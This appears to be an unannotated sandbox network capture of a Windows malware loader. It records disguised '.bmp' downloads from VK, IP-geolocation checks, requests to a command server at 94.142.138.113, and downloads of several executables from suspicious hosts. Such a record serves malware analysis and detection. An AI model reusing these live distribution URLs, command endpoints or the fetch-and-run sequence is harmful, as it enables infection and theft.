HTTP/1.1 200 OK Server: kittenx Date: Wed, 06 Sep 2023 04:54:07 GMT Content-Type: image/x-ms-bmp Content-Length: 4861444 Connection: keep-alive Last-Modified: Thu, 31 Aug 2023 15:21:34 GMT ETag: "64f0affe-4a2e04" Expires: Fri, 06 Oct 2023 04:54:07 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc44017378_668903345?hash=Zaetqx11oeFBdkWDjedCOItoPTbkAjFxDdmH7zuyJRo&dl=y4MBsDhjAnxnZdtJN2fzh9BSudm5oc4mHzNl4ImM7J0&api=1&no_preview=1#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9081056223464981905_6S6S8LT16rZijYalD6K7qJBrf4bOsRLesN0SYp3fQRg; remixlgck=4dba72abc42d3ca655; remixstid=2115366604_mjrKgBZZmvPCaz4ozhkdVrQRa6fit3XZAQzoxhMd7Dz; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 06 Sep 2023 04:54:08 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114558 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-22.userapi.com/c240331/u44017378/docs/d38/3cdd8ad7ce1f/crypted.bmp?extra=oWgEqzAKAoeJqXlNWcq1L2Twro57C2oqwpXLM14hc75rg4Axr9nzDq7o6meuTh0Y7BWbfc7d9cnupYGV36dyCqvgfEdnTEO8YF_-s6Jw3JzLfmxX6fhV9rtqGT0yzb_52y_5s8JLbtSZ8cII X-Frontend: front220007 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c240331/u44017378/docs/d38/3cdd8ad7ce1f/crypted.bmp?extra=oWgEqzAKAoeJqXlNWcq1L2Twro57C2oqwpXLM14hc75rg4Axr9nzDq7o6meuTh0Y7BWbfc7d9cnupYGV36dyCqvgfEdnTEO8YF_-s6Jw3JzLfmxX6fhV9rtqGT0yzb_52y_5s8JLbtSZ8cII HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-22.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 06 Sep 2023 04:54:08 GMT Content-Type: image/x-ms-bmp Content-Length: 307580 Connection: keep-alive Last-Modified: Tue, 05 Sep 2023 11:12:50 GMT ETag: "64f70d32-4b17c" Expires: Fri, 06 Oct 2023 04:54:08 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5rJcqQDpxT%2Bjj58hZGk9qreNmyQCDXrw5RGyRza4ShOaZt1v0lrwl7pyvKCXl4fbvq3xhNNwCgFgjXRCLRkjBX7iunuIvxMOlFvrV1ldEZf5pO%2Fw4EjP7FQI1yYmTg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80241ce8689d8d00-KIX

GET /demo/home.php?s=175.208.134.152 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:15 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive X-IPLB-Request-ID: AC46E90D:66EA_93878F2E:0050_64F805F7_22265543:2467A X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZjNSM8n6%2BsVokXf38bmb69knyIodZg7EMoX8C7fADHn236ZDojpmbv2BDdS5lftuE4LVAkK7Lul4Gb4QXvMcnbRTEzc6rGEy4dKw%2FEoEx%2BgzDjsn9Hj5Qp0FcQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80241ce9bb598d2b-KIX alt-svc: h3=":443"; ma=86400

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: yandex.ru

HTTP/1.1 302 Moved temporarily Accept-CH: Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA, Sec-CH-UA-Full-Version-List, Sec-CH-UA-WoW64, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Platform, Sec-CH-UA-Full-Version, Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECT Cache-Control: max-age=1209600,private Date: Wed, 06 Sep 2023 04:54:21 GMT Location: https://dzen.ru/?yredirect=true NEL: {"report_to": "network-errors", "max_age": 100, "success_fraction": 0.001, "failure_fraction": 0.1} P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI" Portal: Home Report-To: { "group": "network-errors", "max_age": 100, "endpoints": [{"url": "https://dr.yandex.net/nel", "priority": 1}, {"url": "https://dr2.yandex.net/nel", "priority": 2}]} Transfer-Encoding: chunked X-Content-Type-Options: nosniff X-Robots-Tag: unavailable_after: 12 Sep 2022 00:00:00 PST X-Yandex-Req-Id: 1693976061848430-6276167774055200923-balancer-l7leveler-kubr-yp-vla-26-BAL-2169 set-cookie: is_gdpr=0; Path=/; Domain=.yandex.ru; Expires=Fri, 05 Sep 2025 04:54:21 GMT set-cookie: is_gdpr_b=CLnyExDnzAEoAg==; Path=/; Domain=.yandex.ru; Expires=Fri, 05 Sep 2025 04:54:21 GMT set-cookie: _yasc=SqNriduPcW3DEV324zbMWUjr8AEan8wqu+z+Xe0zZKHczJ8aQxa4cOE6UHAvC1hL; domain=.yandex.ru; path=/; expires=Sat, 03 Sep 2033 04:54:21 GMT; secure set-cookie: i=xEJTw3pbkFCDLVpuBFkId5qiBs2hPFI5BkTVM1c3T99f9d4yYVfWgFnJZ+lRGsr4Wh5F0v/kqdBDZq6kUE3BECwUVPg=; Expires=Fri, 05-Sep-2025 04:54:21 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly set-cookie: yandexuid=9552009231693976061; Expires=Fri, 05-Sep-2025 04:54:21 GMT; Domain=.yandex.ru; Path=/; Secure

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-control: max-age=28800 X-IPLB-Request-ID: AC4631A2:5C4C_93878F2E:0050_64F805FE_22316864:24679 X-IPLB-Instance: 30783 CF-Cache-Status: EXPIRED Last-Modified: Tue, 05 Sep 2023 23:36:33 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iOMHiV1ynf0pgkkq8TazNTWi0v%2FRcj41sm7c%2BEh1ouVtBy3sr6uW41jyvyN8oTKfV%2BgA4vULQpnNYpRSfwL70pXO6xvMZeQvfryWbcpnPGU5cqIsuTiDxRurkg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80241d12a8620ab2-KIX alt-svc: h3=":443"; ma=86400

POST /v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self HTTP/1.1 Connection: Keep-Alive Referer: https://db-ip.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 0 Host: api.db-ip.com

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:22 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: http*://*db-ip.com Cache-control: max-age=180 X-IPLB-Request-ID: AC46E902:B8FE_93878F2E:0050_64F805FE_2231ABDB:2467C X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FMV8bgl8IFWeTGqx%2BKb52x5f2mOKPPpG4%2BMs0UUW2K9I%2FLOX%2FJiNHoY3MsP7thWD872Jc4b06zD%2F3euaPrv00oaq3or31Y%2FfJOAzbr6aZmRomG5sdBtntIasheO5VEg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80241d1669768372-KIX alt-svc: h3=":443"; ma=86400

GET /?yredirect=true HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: dzen.ru

HTTP/1.1 302 Found Content-Length: 0 Content-Type: application/json;charset=utf-8 Date: Wed, 06 Sep 2023 04:54:24 GMT Location: https://sso.passport.yandex.ru/push?uuid=1c2cbbd3-3e8d-405c-9ea3-cfda8d7fc41e&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue Set-Cookie: zen_sso_checked=1; Path=/; Domain=.dzen.ru; Expires=Wed, 06-Sep-2023 16:54:24 GMT; Max-Age=43200; Secure; HttpOnly Set-Cookie: _yasc=qFTKog/qsLxTFu9cbGTbjuG9Xpf3CwCY1ANnoikRiQqNRoLHVRAjPalNHFe1Ow==; domain=.dzen.ru; path=/; expires=Sat, 03 Sep 2033 04:54:24 GMT; secure

GET /push?uuid=1c2cbbd3-3e8d-405c-9ea3-cfda8d7fc41e&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sso.passport.yandex.ru Cookie: yandexuid=9552009231693976061; i=xEJTw3pbkFCDLVpuBFkId5qiBs2hPFI5BkTVM1c3T99f9d4yYVfWgFnJZ+lRGsr4Wh5F0v/kqdBDZq6kUE3BECwUVPg=; _yasc=SqNriduPcW3DEV324zbMWUjr8AEan8wqu+z+Xe0zZKHczJ8aQxa4cOE6UHAvC1hL; is_gdpr_b=CLnyExDnzAEoAg==; is_gdpr=0

HTTP/1.1 200 OK Server: nginx Date: Wed, 06 Sep 2023 04:54:26 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1959 Connection: close Vary: Accept-Encoding X-Download-Options: noopen X-Content-Type-Options: nosniff Surrogate-Control: no-store Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate Pragma: no-cache Expires: 0 X-DNS-Prefetch-Control: off X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src 'none'; frame-ancestors https://*.dzen.ru https://dzen.ru; connect-src 'self'; script-src 'nonce-402bdf29767deeceaf170217c06f09ce' 'self'; img-src 'self' Set-Cookie: mda2_beacon=1693976066512; Domain=.passport.yandex.ru; Expires=Tue, 19 Jan 2038 03:14:07 GMT; Secure; Path=/ Set-Cookie: ys=c_chck.1042998335; Domain=.yandex.ru; Secure; Path=/ Set-Cookie: mda2_domains=dzen.ru; Domain=.passport.yandex.ru; Expires=Tue, 19 Jan 2038 03:14:07 GMT; Secure; Path=/ Referrer-Policy: origin ETag: W/"7a7-I0e+E8pIguL8dP+0o1zr+h51E2g" Strict-Transport-Security: max-age=315360000; includeSubDomains

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9081056223464981905_6S6S8LT16rZijYalD6K7qJBrf4bOsRLesN0SYp3fQRg; remixlgck=4dba72abc42d3ca655; remixstid=2115366604_mjrKgBZZmvPCaz4ozhkdVrQRa6fit3XZAQzoxhMd7Dz

HTTP/1.1 200 OK Server: kittenx Date: Wed, 06 Sep 2023 04:54:27 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 305082 Connection: keep-alive X-Powered-By: KPHP/7.4.114558 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front225207 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-control: max-age=28800 X-IPLB-Request-ID: AC46E919:FEF2_93878F2E:0050_64F80607_222656B3:2467A X-IPLB-Instance: 30783 CF-Cache-Status: EXPIRED Last-Modified: Tue, 05 Sep 2023 23:00:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rYNxAQltPRPze1FHkyDuayaywaIyF2y31u80%2BJAWA4k7w%2Ff4rSPBBVWk31KgJPZM4DDyEYkGikZL6J%2BEpiNTYABPxJliq%2B7ZOlniM6a1yW%2FUYZ7Rju%2BNouWjlA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80241d4e7c908cf8-KIX alt-svc: h3=":443"; ma=86400

POST /v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self HTTP/1.1 Connection: Keep-Alive Referer: https://db-ip.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 0 Host: api.db-ip.com

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:32 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: http*://*db-ip.com Cache-control: max-age=180 X-IPLB-Request-ID: AC46E943:E6BA_93878F2E:0050_64F80608_222656BF:2467A X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fqsF5WkL14UZ7%2Be6wQfMfjZ7HpEUS8J%2Bkz8Hx7YgsthKhwhMy6K%2FmRkZGbvlckrHlDNYiilSSB1jaaVVTCZ1aPJ5LIXuEi1GVrdhAampZyAQelbhbwlag7EZGK%2B1McE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80241d52dc35834d-KIX alt-svc: h3=":443"; ma=86400

GET /doc44017378_668777192?hash=bErtt2Itw8CZPTouyuXblBKb3pLfVImQzvGWnZ4CyVs&dl=vm2AArvcYQaQAETnMlmPKTg0CoqMAAqRh2fogvAYbWP&api=1&no_preview=1#tmwvr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9081056223464981905_6S6S8LT16rZijYalD6K7qJBrf4bOsRLesN0SYp3fQRg; remixlgck=4dba72abc42d3ca655; remixstid=2115366604_mjrKgBZZmvPCaz4ozhkdVrQRa6fit3XZAQzoxhMd7Dz

HTTP/1.1 302 Found Server: kittenx Date: Wed, 06 Sep 2023 04:54:34 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114558 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c235131/u44017378/docs/d58/b5d7bd164765/tmvwr.bmp?extra=MOoJ_YAgLF-1um3Me5WawUQVtSpNdXdk4O4HjEHIoEJYoGofA_i-K7joq0CWxFxZ_12PJ_jQLkx1WwKPGJ02adtFNG4_nnXRhcuoM-7EcVqjywc84kVq559VzCTblgn2fgMn9BIrYrs9lDH_ X-Frontend: front225207 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c235131/u44017378/docs/d58/b5d7bd164765/tmvwr.bmp?extra=MOoJ_YAgLF-1um3Me5WawUQVtSpNdXdk4O4HjEHIoEJYoGofA_i-K7joq0CWxFxZ_12PJ_jQLkx1WwKPGJ02adtFNG4_nnXRhcuoM-7EcVqjywc84kVq559VzCTblgn2fgMn9BIrYrs9lDH_ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 06 Sep 2023 04:54:35 GMT Content-Type: image/x-ms-bmp Content-Length: 6029628 Connection: keep-alive Last-Modified: Sat, 02 Sep 2023 13:19:51 GMT ETag: "64f33677-5c013c" Expires: Fri, 06 Oct 2023 04:54:35 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 94.142.138.113

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:53:42 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.113

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:53:43 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.113

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:53:49 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 5164 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /download/Services.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 94.156.253.187 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:53:50 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 31 Aug 2023 12:40:35 GMT ETag: "718400-6043759c19da6" Accept-Ranges: bytes Content-Length: 7439360 Content-Type: application/x-msdos-program

HEAD /info/fotos894.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.68.238 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Length: 848896 Content-Type: application/octet-stream Last-Modified: Wed, 06 Sep 2023 12:51:20 GMT Accept-Ranges: bytes ETag: "eb428fd5c0e0d91:0" Server: Microsoft-IIS/10.0 Date: Wed, 06 Sep 2023 12:53:50 GMT

HEAD /g.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 87.121.221.58 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:53:50 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 06 Sep 2023 04:45:02 GMT ETag: "6a600-604a96811f1a5" Accept-Ranges: bytes Content-Length: 435712 Content-Type: application/x-msdos-program

HEAD /autorun.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 194.169.175.232 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:53:50 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 Last-Modified: Tue, 05 Sep 2023 23:34:28 GMT ETag: "4b178-604a511689996" Accept-Ranges: bytes Content-Length: 307576 Content-Type: application/x-msdownload

HEAD /order/set17.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: myfilebest.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:53:50 GMT Content-Type: application/octet-stream Content-Length: 1254133 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=set17.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: max-age=14400, must-revalidate Pragma: public CF-Cache-Status: HIT Age: 5958 Last-Modified: Wed, 06 Sep 2023 03:14:32 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XojEk2goTI7EVT3taRwwF2f7hqM%2BL5SjzyXCaPDTXyG2S9HNZ01CWFzBcN4LzjZpc88ygbIUizlWOXOxK2qMRb5pLI2AQq%2Bdb190jDSJ88c%2B0sqC7tK%2B4obgib0xez0CNA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80241c4d1ff619ca-KIX alt-svc: h3=":443"; ma=86400

HEAD /calc2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: ralphkors.top Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:53:50 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 06 Sep 2023 04:45:02 GMT ETag: "44800-604a9680e6eb8" Accept-Ranges: bytes Content-Length: 280576 Connection: close Content-Type: application/x-msdos-program

GET /order/set17.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: myfilebest.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:53:50 GMT Content-Type: application/octet-stream Content-Length: 1254133 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=set17.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: max-age=14400, must-revalidate Pragma: public CF-Cache-Status: HIT Age: 5958 Last-Modified: Wed, 06 Sep 2023 03:14:32 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U9Z%2F9pJgPddzRmOzb5v993Gy2M3v70BaNxJgS0WplXV0Tst2csNw1WSC2eYEK%2FsnkraG1JPuMJIkx%2BL8FtRX2HOCCeYSptdPII%2Bp04lfxOZIGKa34JYW73PR7P0txC8t%2FA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80241c4d688319ca-KIX alt-svc: h3=":443"; ma=86400

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Mon, 21 Aug 2023 22:08:28 GMT ETag: "37d-603761e33cf00" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Wed, 06 Sep 2023 05:53:50 GMT Date: Wed, 06 Sep 2023 04:53:50 GMT Connection: keep-alive

GET /calc2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: ralphkors.top Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:53:50 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 06 Sep 2023 04:45:02 GMT ETag: "44800-604a9680e6eb8" Accept-Ranges: bytes Content-Length: 280576 Connection: close Content-Type: application/x-msdos-program

GET /download/Services.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 94.156.253.187 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:53:50 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 31 Aug 2023 12:40:35 GMT ETag: "718400-6043759c19da6" Accept-Ranges: bytes Content-Length: 7439360 Content-Type: application/x-msdos-program

